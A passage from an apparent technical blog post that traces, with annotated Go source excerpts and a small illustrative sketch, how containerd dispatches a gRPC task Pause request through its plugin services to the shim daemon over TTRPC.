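<p>This is why a blank import (<code class="language-plaintext highlighter-rouge">_ "..."</code>) is enough: nothing from the package is referenced by name, but its <code class="language-plaintext highlighter-rouge">init()</code> still runs.</p>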

<p>Later, when the server prepares to run, it calls the <code class="language-plaintext highlighter-rouge">Register()</code> method of every registered service. <code class="language-plaintext highlighter-rouge">Register()</code> sets up the gRPC endpoints from a predefined service descriptor [8], and this is where <strong>their handlers are finally attached</strong> [9].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// plugins/services/tasks/service.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">service</span><span class="p">)</span> <span class="n">Register</span><span class="p">(</span><span class="n">server</span> <span class="o">*</span><span class="n">grpc</span><span class="o">.</span><span class="n">Server</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="n">api</span><span class="o">.</span><span class="n">RegisterTasksServer</span><span class="p">(</span><span class="n">server</span><span class="p">,</span> <span class="n">s</span><span class="p">)</span> <span class="c">// &lt;--------</span>
    <span class="k">return</span> <span class="no">nil</span>
<span class="p">}</span>

<span class="c">// api/services/tasks/v1/tasks_grpc.pb.go</span>
<span class="k">func</span> <span class="n">RegisterTasksServer</span><span class="p">(</span><span class="n">s</span> <span class="n">grpc</span><span class="o">.</span><span class="n">ServiceRegistrar</span><span class="p">,</span> <span class="n">srv</span> <span class="n">TasksServer</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">s</span><span class="o">.</span><span class="n">RegisterService</span><span class="p">(</span><span class="o">&amp;</span><span class="n">Tasks_ServiceDesc</span><span class="p">,</span> <span class="n">srv</span><span class="p">)</span> <span class="c">// &lt;--------</span>
<span class="p">}</span>

<span class="k">var</span> <span class="n">Tasks_ServiceDesc</span> <span class="o">=</span> <span class="n">grpc</span><span class="o">.</span><span class="n">ServiceDesc</span><span class="p">{</span> <span class="c">// [8]</span>
    <span class="n">ServiceName</span><span class="o">:</span> <span class="s">"containerd.services.tasks.v1.Tasks"</span><span class="p">,</span>
    <span class="n">HandlerType</span><span class="o">:</span> <span class="p">(</span><span class="o">*</span><span class="n">TasksServer</span><span class="p">)(</span><span class="no">nil</span><span class="p">),</span>
    <span class="n">Methods</span><span class="o">:</span> <span class="p">[]</span><span class="n">grpc</span><span class="o">.</span><span class="n">MethodDesc</span><span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="p">{</span>
            <span class="n">MethodName</span><span class="o">:</span> <span class="s">"Pause"</span><span class="p">,</span>
            <span class="n">Handler</span><span class="o">:</span>    <span class="n">_Tasks_Pause_Handler</span><span class="p">,</span> <span class="c">// [9]</span>
        <span class="p">},</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So if we send a request to the <code class="language-plaintext highlighter-rouge">"/containerd.services.tasks.v1.Tasks/Pause"</code> gRPC endpoint, <code class="language-plaintext highlighter-rouge">_Tasks_Pause_Handler()</code> will be invoked.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">func</span> <span class="n">_Tasks_Pause_Handler</span><span class="p">(</span><span class="n">srv</span> <span class="k">interface</span><span class="p">{},</span> <span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">dec</span> <span class="k">func</span><span class="p">(</span><span class="k">interface</span><span class="p">{})</span> <span class="kt">error</span><span class="p">,</span> <span class="n">interceptor</span> <span class="n">grpc</span><span class="o">.</span><span class="n">UnaryServerInterceptor</span><span class="p">)</span> <span class="p">(</span><span class="k">interface</span><span class="p">{},</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">in</span> <span class="o">:=</span> <span class="nb">new</span><span class="p">(</span><span class="n">PauseTaskRequest</span><span class="p">)</span>
    <span class="c">// [...] (dec(in) decodes the request into in)</span>
    <span class="n">info</span> <span class="o">:=</span> <span class="o">&amp;</span><span class="n">grpc</span><span class="o">.</span><span class="n">UnaryServerInfo</span><span class="p">{</span>
        <span class="n">Server</span><span class="o">:</span>     <span class="n">srv</span><span class="p">,</span>
        <span class="n">FullMethod</span><span class="o">:</span> <span class="s">"/containerd.services.tasks.v1.Tasks/Pause"</span><span class="p">,</span>
    <span class="p">}</span>
    <span class="n">handler</span> <span class="o">:=</span> <span class="k">func</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">req</span> <span class="k">interface</span><span class="p">{})</span> <span class="p">(</span><span class="k">interface</span><span class="p">{},</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="n">srv</span><span class="o">.</span><span class="p">(</span><span class="n">TasksServer</span><span class="p">)</span><span class="o">.</span><span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">req</span><span class="o">.</span><span class="p">(</span><span class="o">*</span><span class="n">PauseTaskRequest</span><span class="p">))</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="n">interceptor</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">in</span><span class="p">,</span> <span class="n">info</span><span class="p">,</span> <span class="n">handler</span><span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>
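
<p>To make the dispatch pattern easier to see in isolation, here is a minimal, dependency-free sketch. It is not containerd or grpc-go code: <code class="language-plaintext highlighter-rouge">unaryHandler</code>, <code class="language-plaintext highlighter-rouge">unaryInterceptor</code>, <code class="language-plaintext highlighter-rouge">pauser</code>, <code class="language-plaintext highlighter-rouge">fakeTasks</code> and the <code class="language-plaintext highlighter-rouge">/demo.Tasks/Pause</code> method name are all hypothetical stand-ins, and the request is a plain string instead of a decoded protobuf message. It only shows the idea of looking up a handler by full method name and letting an interceptor decide when the real method runs.</p>

```go
package main

import (
	"context"
	"errors"
	"fmt"
)

// unaryHandler and unaryInterceptor imitate the shapes of the gRPC types used
// above. They are re-declared here (assumption) so the sketch needs no modules.
type unaryHandler func(ctx context.Context, req any) (any, error)
type unaryInterceptor func(ctx context.Context, req any, fullMethod string, h unaryHandler) (any, error)

// methodHandler plays the role of a generated _Tasks_*_Handler function.
type methodHandler func(srv any, ctx context.Context, ic unaryInterceptor) (any, error)

// pauser is a hypothetical stand-in for the TasksServer interface.
type pauser interface {
	Pause(ctx context.Context, id string) (string, error)
}

type fakeTasks struct{}

func (fakeTasks) Pause(_ context.Context, id string) (string, error) {
	return "paused " + id, nil
}

// pauseHandler wraps the real method in a closure and hands it to the interceptor.
func pauseHandler(srv any, ctx context.Context, ic unaryInterceptor) (any, error) {
	in := "demo-container" // a real handler would decode this from the wire
	h := func(ctx context.Context, req any) (any, error) {
		return srv.(pauser).Pause(ctx, req.(string))
	}
	return ic(ctx, in, "/demo.Tasks/Pause", h)
}

// dispatch finds the handler registered for the full method name and runs it.
func dispatch(table map[string]methodHandler, srv any, fullMethod string, ic unaryInterceptor) (any, error) {
	h, ok := table[fullMethod]
	if !ok {
		return nil, errors.New("unknown method: " + fullMethod)
	}
	return h(srv, context.Background(), ic)
}

// passthrough is an interceptor that does nothing but invoke the handler.
func passthrough(ctx context.Context, req any, _ string, h unaryHandler) (any, error) {
	return h(ctx, req)
}

func main() {
	table := map[string]methodHandler{"/demo.Tasks/Pause": pauseHandler}
	out, err := dispatch(table, fakeTasks{}, "/demo.Tasks/Pause", passthrough)
	fmt.Println(out, err)
}
```

<p>The point of the closure is that the interceptor chain never needs to know the concrete server type; it only sees an opaque handler it can call, wrap, or reject.</p>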

<h3 id="32-dispatch-request-to-shim-daemon">3.2. Dispatch Request to shim Daemon</h3>

<p>To trace the actual handler behind <code class="language-plaintext highlighter-rouge">srv.(TasksServer).Pause()</code>, we need to go back and find where <code class="language-plaintext highlighter-rouge">TasksServer</code> comes from. <code class="language-plaintext highlighter-rouge">srv</code> is the second argument passed to <code class="language-plaintext highlighter-rouge">RegisterTasksServer()</code>, which here is <code class="language-plaintext highlighter-rouge">s</code>, a <code class="language-plaintext highlighter-rouge">service</code> object defined in <code class="language-plaintext highlighter-rouge">plugins/services/tasks/service.go</code> [1].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// api/services/tasks/v1/tasks_grpc.pb.go</span>
<span class="k">func</span> <span class="n">RegisterTasksServer</span><span class="p">(</span><span class="n">s</span> <span class="n">grpc</span><span class="o">.</span><span class="n">ServiceRegistrar</span><span class="p">,</span> <span class="n">srv</span> <span class="n">TasksServer</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">s</span><span class="o">.</span><span class="n">RegisterService</span><span class="p">(</span><span class="o">&amp;</span><span class="n">Tasks_ServiceDesc</span><span class="p">,</span> <span class="n">srv</span><span class="p">)</span> <span class="c">// &lt;--------</span>
<span class="p">}</span>

<span class="c">// plugins/services/tasks/service.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">service</span><span class="p">)</span> <span class="n">Register</span><span class="p">(</span><span class="n">server</span> <span class="o">*</span><span class="n">grpc</span><span class="o">.</span><span class="n">Server</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="n">api</span><span class="o">.</span><span class="n">RegisterTasksServer</span><span class="p">(</span><span class="n">server</span><span class="p">,</span> <span class="n">s</span><span class="p">)</span> <span class="c">// [1]</span>
    <span class="k">return</span> <span class="no">nil</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">service</code>’s pause handler then calls <code class="language-plaintext highlighter-rouge">s.local.Pause()</code> [2], where <code class="language-plaintext highlighter-rouge">local</code> is set during initialization from the plugin instance <code class="language-plaintext highlighter-rouge">i</code> [3]. <code class="language-plaintext highlighter-rouge">i</code> is looked up from the init context by the ID <code class="language-plaintext highlighter-rouge">services.TasksService</code> [4], which is the ID under which the local task service in <code class="language-plaintext highlighter-rouge">plugins/services/tasks/local.go</code> registers itself [5].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// plugins/services/tasks/service.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">service</span><span class="p">)</span> <span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">r</span> <span class="o">*</span><span class="n">api</span><span class="o">.</span><span class="n">PauseTaskRequest</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">ptypes</span><span class="o">.</span><span class="n">Empty</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">return</span> <span class="n">s</span><span class="o">.</span><span class="n">local</span><span class="o">.</span><span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">r</span><span class="p">)</span> <span class="c">// [2]</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">init</span><span class="p">()</span> <span class="p">{</span>
    <span class="n">registry</span><span class="o">.</span><span class="n">Register</span><span class="p">(</span><span class="o">&amp;</span><span class="n">plugin</span><span class="o">.</span><span class="n">Registration</span><span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">InitFn</span><span class="o">:</span> <span class="k">func</span><span class="p">(</span><span class="n">ic</span> <span class="o">*</span><span class="n">plugin</span><span class="o">.</span><span class="n">InitContext</span><span class="p">)</span> <span class="p">(</span><span class="n">any</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
            <span class="c">// [...]</span>
            <span class="n">i</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">ic</span><span class="o">.</span><span class="n">GetByID</span><span class="p">(</span><span class="n">plugins</span><span class="o">.</span><span class="n">ServicePlugin</span><span class="p">,</span> <span class="n">services</span><span class="o">.</span><span class="n">TasksService</span><span class="p">)</span> <span class="c">// [4]</span>
            <span class="c">// [...]</span>
            <span class="k">return</span> <span class="o">&amp;</span><span class="n">service</span><span class="p">{</span><span class="n">local</span><span class="o">:</span> <span class="n">i</span><span class="o">.</span><span class="p">(</span><span class="n">api</span><span class="o">.</span><span class="n">TasksClient</span><span class="p">)},</span> <span class="no">nil</span> <span class="c">// [3]</span>
        <span class="p">},</span>
    <span class="p">})</span>
<span class="p">}</span>

<span class="c">// plugins/services/tasks/local.go</span>
<span class="k">func</span> <span class="n">init</span><span class="p">()</span> <span class="p">{</span>
    <span class="n">registry</span><span class="o">.</span><span class="n">Register</span><span class="p">(</span><span class="o">&amp;</span><span class="n">plugin</span><span class="o">.</span><span class="n">Registration</span><span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="n">ID</span><span class="o">:</span>       <span class="n">services</span><span class="o">.</span><span class="n">TasksService</span><span class="p">,</span> <span class="c">// [5]</span>
        <span class="c">// [...]</span>
    <span class="p">})</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">local</code> package defines <code class="language-plaintext highlighter-rouge">Pause()</code>. It first gets the container runtime task object via <code class="language-plaintext highlighter-rouge">l.getTask()</code> [6] and then calls <code class="language-plaintext highlighter-rouge">t.Pause()</code> [7]. The process for obtaining the task object is somewhat complicated, so I’ve left some comments to help follow the call flow.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// plugins/services/tasks/local.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">l</span> <span class="o">*</span><span class="n">local</span><span class="p">)</span> <span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">r</span> <span class="o">*</span><span class="n">api</span><span class="o">.</span><span class="n">PauseTaskRequest</span><span class="p">,</span> <span class="n">_</span> <span class="o">...</span><span class="n">grpc</span><span class="o">.</span><span class="n">CallOption</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">ptypes</span><span class="o">.</span><span class="n">Empty</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">t</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">l</span><span class="o">.</span><span class="n">getTask</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">r</span><span class="o">.</span><span class="n">ContainerID</span><span class="p">)</span> <span class="c">// [6], return runtime.Task</span>
    <span class="n">err</span> <span class="o">=</span> <span class="n">t</span><span class="o">.</span><span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span><span class="p">)</span> <span class="c">// [7]</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">l</span> <span class="o">*</span><span class="n">local</span><span class="p">)</span> <span class="n">getTask</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">id</span> <span class="kt">string</span><span class="p">)</span> <span class="p">(</span><span class="n">runtime</span><span class="o">.</span><span class="n">Task</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">container</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">l</span><span class="o">.</span><span class="n">getContainer</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">id</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">l</span><span class="o">.</span><span class="n">getTaskFromContainer</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">container</span><span class="p">)</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">l</span> <span class="o">*</span><span class="n">local</span><span class="p">)</span> <span class="n">getContainer</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">id</span> <span class="kt">string</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">containers</span><span class="o">.</span><span class="n">Container</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">var</span> <span class="n">container</span> <span class="n">containers</span><span class="o">.</span><span class="n">Container</span>
    <span class="c">// 'initFunc()' sets 'l.containers' to 'metadata.NewContainerStore(db)'</span>
    <span class="n">container</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">l</span><span class="o">.</span><span class="n">containers</span><span class="o">.</span><span class="n">Get</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">id</span><span class="p">)</span> <span class="c">// call 'Get()' in 'core/metadata/containers.go'</span>
                                                <span class="c">// -&gt; get container from db</span>
    <span class="k">return</span> <span class="o">&amp;</span><span class="n">container</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">l</span> <span class="o">*</span><span class="n">local</span><span class="p">)</span> <span class="n">getTaskFromContainer</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">container</span> <span class="o">*</span><span class="n">containers</span><span class="o">.</span><span class="n">Container</span><span class="p">)</span> <span class="p">(</span><span class="n">runtime</span><span class="o">.</span><span class="n">Task</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="c">/**
     * initFunc() sets 'l.v2Runtime' to 'v2r.(runtime.PlatformRuntime)'
     * -&gt; v2r comes from 'ic.GetByID(plugins.RuntimePluginV2, "task")'
     * -&gt; init() in 'core/runtime/v2/task_manager.go' registers 'plugins.RuntimePluginV2'
     * -&gt; Get() returns 'newShimTask(shim)', which is defined in 'core/runtime/v2/shim.go'
     * -&gt; shimTask is the concrete type that implements the runtime.Task interface
     */</span>
    <span class="n">t</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">l</span><span class="o">.</span><span class="n">v2Runtime</span><span class="o">.</span><span class="n">Get</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">container</span><span class="o">.</span><span class="n">ID</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">t</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The task object <code class="language-plaintext highlighter-rouge">t</code> on which <code class="language-plaintext highlighter-rouge">t.Pause()</code> is called is returned from <code class="language-plaintext highlighter-rouge">newShimTask(shim)</code> in the <code class="language-plaintext highlighter-rouge">v2</code> package, so <code class="language-plaintext highlighter-rouge">t.Pause()</code> resolves to the <code class="language-plaintext highlighter-rouge">Pause()</code> method of <code class="language-plaintext highlighter-rouge">shimTask</code> in the same package [8]. It then calls <code class="language-plaintext highlighter-rouge">s.task.Pause()</code>, where <code class="language-plaintext highlighter-rouge">s.task</code> [9] is the task client created by <code class="language-plaintext highlighter-rouge">NewTaskClient()</code> [10].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// core/runtime/v2/shim.go</span>
<span class="k">package</span> <span class="n">v2</span>

<span class="k">func</span> <span class="n">newShimTask</span><span class="p">(</span><span class="n">shim</span> <span class="n">ShimInstance</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">shimTask</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">_</span><span class="p">,</span> <span class="n">version</span> <span class="o">:=</span> <span class="n">shim</span><span class="o">.</span><span class="n">Endpoint</span><span class="p">()</span>
    <span class="n">taskClient</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">NewTaskClient</span><span class="p">(</span><span class="n">shim</span><span class="o">.</span><span class="n">Client</span><span class="p">(),</span> <span class="n">version</span><span class="p">)</span> <span class="c">// [10]</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="o">&amp;</span><span class="n">shimTask</span><span class="p">{</span>
        <span class="n">ShimInstance</span><span class="o">:</span> <span class="n">shim</span><span class="p">,</span>
        <span class="n">task</span><span class="o">:</span>         <span class="n">taskClient</span><span class="p">,</span> <span class="c">// [9]</span>
    <span class="p">},</span> <span class="no">nil</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">shimTask</span><span class="p">)</span> <span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span> <span class="c">// [8]</span>
    <span class="c">/**
     * s.task holds the return value of NewTaskClient(), which switches on the client type and version
     * - ttrpc + v2 -&gt; *ttrpcV2Bridge
     * - ttrpc + v3 -&gt; api.NewTTRPCTaskClient
     * - grpc + v3  -&gt; *grpcV3Bridge
     */</span>
    <span class="k">if</span> <span class="n">_</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">s</span><span class="o">.</span><span class="n">task</span><span class="o">.</span><span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">task</span><span class="o">.</span><span class="n">PauseRequest</span><span class="p">{</span>
        <span class="n">ID</span><span class="o">:</span> <span class="n">s</span><span class="o">.</span><span class="n">ID</span><span class="p">(),</span>
    <span class="p">})</span> <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">NewTaskClient()</code> returns a different <code class="language-plaintext highlighter-rouge">TaskServiceClient</code> implementation depending on the client <strong>type</strong> and <strong>version</strong>. For a TTRPC client with version 2, it returns a <code class="language-plaintext highlighter-rouge">ttrpcV2Bridge</code> that wraps the <code class="language-plaintext highlighter-rouge">ttrpctaskClient</code> object created by <code class="language-plaintext highlighter-rouge">v2.NewTTRPCTaskClient()</code> [11]. Finally, <code class="language-plaintext highlighter-rouge">ttrpctaskClient.Pause()</code> wraps the request in a TTRPC message and sends it [12] to the service <code class="language-plaintext highlighter-rouge">"containerd.task.v2.Task"</code> with method <code class="language-plaintext highlighter-rouge">"Pause"</code> through the shim daemon socket.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// core/runtime/v2/bridge.go</span>
<span class="k">func</span> <span class="n">NewTaskClient</span><span class="p">(</span><span class="n">client</span> <span class="n">any</span><span class="p">,</span> <span class="n">version</span> <span class="kt">int</span><span class="p">)</span> <span class="p">(</span><span class="n">TaskServiceClient</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">switch</span> <span class="n">c</span> <span class="o">:=</span> <span class="n">client</span><span class="o">.</span><span class="p">(</span><span class="k">type</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">case</span> <span class="o">*</span><span class="n">ttrpc</span><span class="o">.</span><span class="n">Client</span><span class="o">:</span>
        <span class="k">switch</span> <span class="n">version</span> <span class="p">{</span>
        <span class="k">case</span> <span class="m">2</span><span class="o">:</span>
            <span class="k">return</span> <span class="o">&amp;</span><span class="n">ttrpcV2Bridge</span><span class="p">{</span><span class="n">client</span><span class="o">:</span> <span class="n">v2</span><span class="o">.</span><span class="n">NewTTRPCTaskClient</span><span class="p">(</span><span class="n">c</span><span class="p">)},</span> <span class="no">nil</span> <span class="c">// &lt;--------</span>
        <span class="k">case</span> <span class="m">3</span><span class="o">:</span>
            <span class="k">return</span> <span class="n">api</span><span class="o">.</span><span class="n">NewTTRPCTaskClient</span><span class="p">(</span><span class="n">c</span><span class="p">),</span> <span class="no">nil</span>
        <span class="c">// [...]</span>
        <span class="p">}</span>

    <span class="k">case</span> <span class="n">grpc</span><span class="o">.</span><span class="n">ClientConnInterface</span><span class="o">:</span>
        <span class="c">// [...]</span>
        <span class="k">if</span> <span class="n">version</span> <span class="o">!=</span> <span class="m">3</span> <span class="p">{</span>
            <span class="c">// [...]</span>
        <span class="p">}</span>
        <span class="k">return</span> <span class="o">&amp;</span><span class="n">grpcV3Bridge</span><span class="p">{</span><span class="n">api</span><span class="o">.</span><span class="n">NewTaskClient</span><span class="p">(</span><span class="n">c</span><span class="p">)},</span> <span class="no">nil</span>
    <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c">// api/runtime/task/v2/shim_ttrpc.pb.go</span>
<span class="k">func</span> <span class="n">NewTTRPCTaskClient</span><span class="p">(</span><span class="n">client</span> <span class="o">*</span><span class="n">ttrpc</span><span class="o">.</span><span class="n">Client</span><span class="p">)</span> <span class="n">TTRPCTaskService</span> <span class="p">{</span>
    <span class="k">return</span> <span class="o">&amp;</span><span class="n">ttrpctaskClient</span><span class="p">{</span> <span class="c">// [11]</span>
        <span class="n">client</span><span class="o">:</span> <span class="n">client</span><span class="p">,</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">ttrpctaskClient</span><span class="p">)</span> <span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">req</span> <span class="o">*</span><span class="n">PauseRequest</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">emptypb</span><span class="o">.</span><span class="n">Empty</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">var</span> <span class="n">resp</span> <span class="n">emptypb</span><span class="o">.</span><span class="n">Empty</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">client</span><span class="o">.</span><span class="n">Call</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="s">"containerd.task.v2.Task"</span><span class="p">,</span> <span class="s">"Pause"</span><span class="p">,</span> <span class="n">req</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">resp</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [12]</span>
        <span class="k">return</span> <span class="no">nil</span><span class="p">,</span> <span class="n">err</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="o">&amp;</span><span class="n">resp</span><span class="p">,</span> <span class="no">nil</span>
<span class="p">}</span>
</code></pre></div></div>

<h2 id="4-containerd-shim-runc-v2-shim-daemon">4. containerd-shim-runc-v2 (shim Daemon)</h2>

<p>Every container <strong>needs a <code class="language-plaintext highlighter-rouge">shim</code> daemon</strong> to hold its stdio, wait for its init process, and report exit status back to <code class="language-plaintext highlighter-rouge">containerd</code>. This also decouples the container’s lifecycle from <code class="language-plaintext highlighter-rouge">containerd</code> itself: if <code class="language-plaintext highlighter-rouge">containerd</code> crashes or gets restarted, the <code class="language-plaintext highlighter-rouge">shim</code> keeps running, the container stays alive, and <code class="language-plaintext highlighter-rouge">containerd</code> can later re-attach to the <code class="language-plaintext highlighter-rouge">shim</code> daemon to recover state. To make this possible, each shim daemon exposes a Unix socket, which lets <code class="language-plaintext highlighter-rouge">containerd</code> control the container indirectly.</p>

<p>When a <code class="language-plaintext highlighter-rouge">shim</code> daemon initializes, the main function <code class="language-plaintext highlighter-rouge">run()</code> iterates through all predefined service objects [1] and registers each as a TTRPC service [2].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// pkg/shim/shim.go</span>
<span class="k">func</span> <span class="n">run</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">manager</span> <span class="n">Manager</span><span class="p">,</span> <span class="n">config</span> <span class="n">Config</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">for</span> <span class="n">_</span><span class="p">,</span> <span class="n">p</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">registry</span><span class="o">.</span><span class="n">Graph</span><span class="p">(</span><span class="k">func</span><span class="p">(</span><span class="o">*</span><span class="n">plugin</span><span class="o">.</span><span class="n">Registration</span><span class="p">)</span> <span class="kt">bool</span> <span class="p">{</span> <span class="k">return</span> <span class="no">false</span> <span class="p">})</span> <span class="p">{</span>
        <span class="c">// [...] src is the plugin instance, when it implements a TTRPC service</span>
        <span class="n">ttrpcServices</span> <span class="o">=</span> <span class="nb">append</span><span class="p">(</span><span class="n">ttrpcServices</span><span class="p">,</span> <span class="n">src</span><span class="p">)</span> <span class="c">// [1]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
    <span class="k">for</span> <span class="n">_</span><span class="p">,</span> <span class="n">srv</span> <span class="o">:=</span> <span class="k">range</span> <span class="n">ttrpcServices</span> <span class="p">{</span>
        <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">srv</span><span class="o">.</span><span class="n">RegisterTTRPC</span><span class="p">(</span><span class="n">server</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [2]</span>
            <span class="c">// [...]</span>
        <span class="p">}</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">task</code> package’s register function calls <code class="language-plaintext highlighter-rouge">RegisterService()</code> with endpoint descriptors, one of which is <code class="language-plaintext highlighter-rouge">"Pause"</code> [3].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// cmd/containerd-shim-runc-v2/task/service.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">service</span><span class="p">)</span> <span class="n">RegisterTTRPC</span><span class="p">(</span><span class="n">server</span> <span class="o">*</span><span class="n">ttrpc</span><span class="o">.</span><span class="n">Server</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
